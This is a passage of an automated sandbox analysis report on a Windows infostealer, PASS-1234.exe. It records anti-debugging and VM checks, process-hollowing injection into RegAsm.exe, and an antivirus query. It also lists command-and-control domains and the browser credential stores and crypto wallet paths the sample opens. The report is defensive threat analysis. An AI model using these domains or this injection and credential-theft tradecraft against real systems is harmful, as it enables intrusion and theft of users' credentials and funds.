        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D7667E0_2_00D7667E
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D5E7E00_2_00D5E7E0
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D9A9670_2_00D9A967
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D76ACF0_2_00D76ACF
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D5AB4B0_2_00D5AB4B
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D5ED200_2_00D5ED20
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D76F0D0_2_00D76F0D
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D774360_2_00D77436
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D2364B0_2_00D2364B
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D2364B0_2_00D2364B
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D2364B0_2_00D2364B
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D5B8E00_2_00D5B8E0
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00DE78780_2_00DE7878
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D779720_2_00D77972
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004214401_2_00421440
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004046901_2_00404690
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004060601_2_00406060
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004010001_2_00401000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0043B0E01_2_0043B0E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042120A1_2_0042120A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004032301_2_00403230
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004053201_2_00405320
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0043B4201_2_0043B420
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00423D4E1_2_00423D4E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004365901_2_00436590
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004066301_2_00406630
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004016F01_2_004016F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042672B1_2_0042672B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004089101_2_00408910
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041C9921_2_0041C992
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00433AE01_2_00433AE0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00403C801_2_00403C80
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00407C901_2_00407C90
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00425E621_2_00425E62
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041CE641_2_0041CE64
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00436E001_2_00436E00
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00402E101_2_00402E10
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041DFF11_2_0041DFF1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040F3F0 appears 158 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004086D0 appears 44 times
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: String function: 00D02234 appears 49 times
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: String function: 00D0525E appears 33 times
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: String function: 00D03080 appears 58 times
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: String function: 00D8A688 appears 38 times
        Source: PASS-1234.exeStatic PE information: invalid certificate
        Source: PASS-1234.exe, 00000000.00000000.1659906886.0000000000E28000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameInfDefaultInstall.EXEj% vs PASS-1234.exe
        Source: PASS-1234.exeBinary or memory string: OriginalFilenameInfDefaultInstall.EXEj% vs PASS-1234.exe
        Source: PASS-1234.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@2/1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042B5D0 CoCreateInstance,1_2_0042B5D0
        Source: PASS-1234.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\PASS-1234.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: PASS-1234.exeVirustotal: Detection: 33%
        Source: unknownProcess created: C:\Users\user\Desktop\PASS-1234.exe "C:\Users\user\Desktop\PASS-1234.exe"
        Source: C:\Users\user\Desktop\PASS-1234.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        Source: C:\Users\user\Desktop\PASS-1234.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\PASS-1234.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: PASS-1234.exeStatic file information: File size 1229424 > 1048576
        Source: PASS-1234.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: PASS-1234.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: PASS-1234.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: PASS-1234.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: PASS-1234.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: PASS-1234.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: PASS-1234.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: PASS-1234.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: C:\befqhkpyn\Knonzzz.pdb source: PASS-1234.exe
        Source: PASS-1234.exeStatic PE information: real checksum: 0x136e7a should be: 0x139d60
        Source: PASS-1234.exeStatic PE information: section name: .00cfg
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D021CB push ecx; ret 0_2_00D3FB13
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004401BF push ebx; retf 1_2_004401C8
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004407F6 push esp; iretd 1_2_004407F7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0042D8EC push 20D3F748h; ret 1_2_0042D8F1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_004419E9 push ebp; iretd 1_2_004419F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00440AC9 pushfd ; iretd 1_2_00440ACD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00440AE6 push 00000078h; iretd 1_2_00440AFD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: FirmwareTableInformationJump to behavior
        Source: C:\Users\user\Desktop\PASS-1234.exeAPI coverage: 7.2 %
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5968Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2896Thread sleep time: -30000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D95B4B FindFirstFileExW,0_2_00D95B4B
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D9602F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00D9602F
        Source: RegAsm.exe, 00000001.00000002.1747804223.000000000151B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: RegAsm.exe, 00000001.00000002.1747785888.00000000014DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_00435C40 LdrInitializeThunk,1_2_00435C40
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D50955 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D50955
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D9889B mov eax, dword ptr fs:[00000030h]0_2_00D9889B
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D8542B mov ecx, dword ptr fs:[00000030h]0_2_00D8542B
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D985E7 mov eax, dword ptr fs:[00000030h]0_2_00D985E7
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D986FE mov eax, dword ptr fs:[00000030h]0_2_00D986FE
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D9868D mov eax, dword ptr fs:[00000030h]0_2_00D9868D
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D9863A mov eax, dword ptr fs:[00000030h]0_2_00D9863A
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D987F1 mov eax, dword ptr fs:[00000030h]0_2_00D987F1
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D988D8 mov eax, dword ptr fs:[00000030h]0_2_00D988D8
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D98846 mov eax, dword ptr fs:[00000030h]0_2_00D98846
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D50955 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D50955
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D3F7BA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D3F7BA
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D3FB66 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D3FB66

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Users\user\Desktop\PASS-1234.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00E129C5 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_00E129C5
        Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: PASS-1234.exeString found in binary or memory: tolerateilusidjukl.shop
        Source: PASS-1234.exeString found in binary or memory: shatterbreathepsw.shop
        Source: PASS-1234.exeString found in binary or memory: sideindexfollowragelrew.pw
        Source: PASS-1234.exeString found in binary or memory: productivelookewr.shop
        Source: PASS-1234.exeString found in binary or memory: demonstationfukewko.shop
        Source: PASS-1234.exeString found in binary or memory: alcojoldwograpciw.shop
        Source: PASS-1234.exeString found in binary or memory: liabilitynighstjsko.shop
        Source: PASS-1234.exeString found in binary or memory: shortsvelventysjo.shop
        Source: PASS-1234.exeString found in binary or memory: incredibleextedwj.shop
        Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
        Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
        Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000Jump to behavior
        Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000Jump to behavior
        Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44A000Jump to behavior
        Source: C:\Users\user\Desktop\PASS-1234.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11AE008Jump to behavior
        Source: C:\Users\user\Desktop\PASS-1234.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D3F337 cpuid 0_2_00D3F337
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: GetLocaleInfoEx,FormatMessageA,0_2_00D14B3D
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: GetLocaleInfoEx,0_2_00D3DC1F
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: EnumSystemLocalesW,0_2_00D89F1F
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: EnumSystemLocalesW,0_2_00D8A10E
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: GetLocaleInfoW,0_2_00D8AC69
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00D9B05F
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: EnumSystemLocalesW,0_2_00D9B3A8
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: EnumSystemLocalesW,0_2_00D9B4EB
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: EnumSystemLocalesW,0_2_00D9B42A
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00D9B598
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: GetLocaleInfoW,0_2_00D9B87F
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00D9B9F2
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: GetLocaleInfoW,0_2_00D9BB39
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00D9BC3B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PASS-1234.exeCode function: 0_2_00D8ACB7 GetSystemTimeAsFileTime,0_2_00D8ACB7
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: RegAsm.exe, 00000001.00000002.1747903838.0000000001562000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: RegAsm.exe, 00000001.00000002.1747679285.00000000012F7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: 6Ah6Ah6AWallets/ElectrumA
        Source: RegAsm.exe, 00000001.00000002.1747679285.00000000012F7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: 6Ah6AWallets/JAXX New VersionA
        Source: RegAsm.exe, 00000001.00000002.1747679285.00000000012F7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: Awindow-state.json
        Source: RegAsm.exe, 00000001.00000002.1747679285.00000000012F7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: 6Ah6Ah6AWallets/ExodusAC:\Users\user\AppData\Roaming\Exodus\exodus.wallet4
        Source: RegAsm.exe, 00000001.00000002.1747679285.00000000012F7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: 6Ah6Ah6AWallets/ExodusAC:\Users\user\AppData\Roaming\Exodus\exodus.wallet4
        Source: RegAsm.exe, 00000001.00000002.1747679285.00000000012F7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: h6Aapp-store.jsonAWallets/BinanceC:\Users\user\AppData\Roaming\BinanceA%appdata%\Binance
        Source: RegAsm.exe, 00000001.00000002.1747679285.00000000012F7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: h6AWallets/EthereumA
        Source: RegAsm.exe, 00000001.00000002.1747679285.00000000012F7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: 6Ah6Ah6AWallets/CoinomiC:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
        Source: RegAsm.exe, 00000001.00000002.1747679285.00000000012F7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: A%appdata%\Exodus\exodus.walletAkeystoreT
        Source: RegAsm.exe, 00000001.00000002.1747679285.00000000012F7000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: AC:\Users\user\AppData\Roaming\Ledger Live+
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
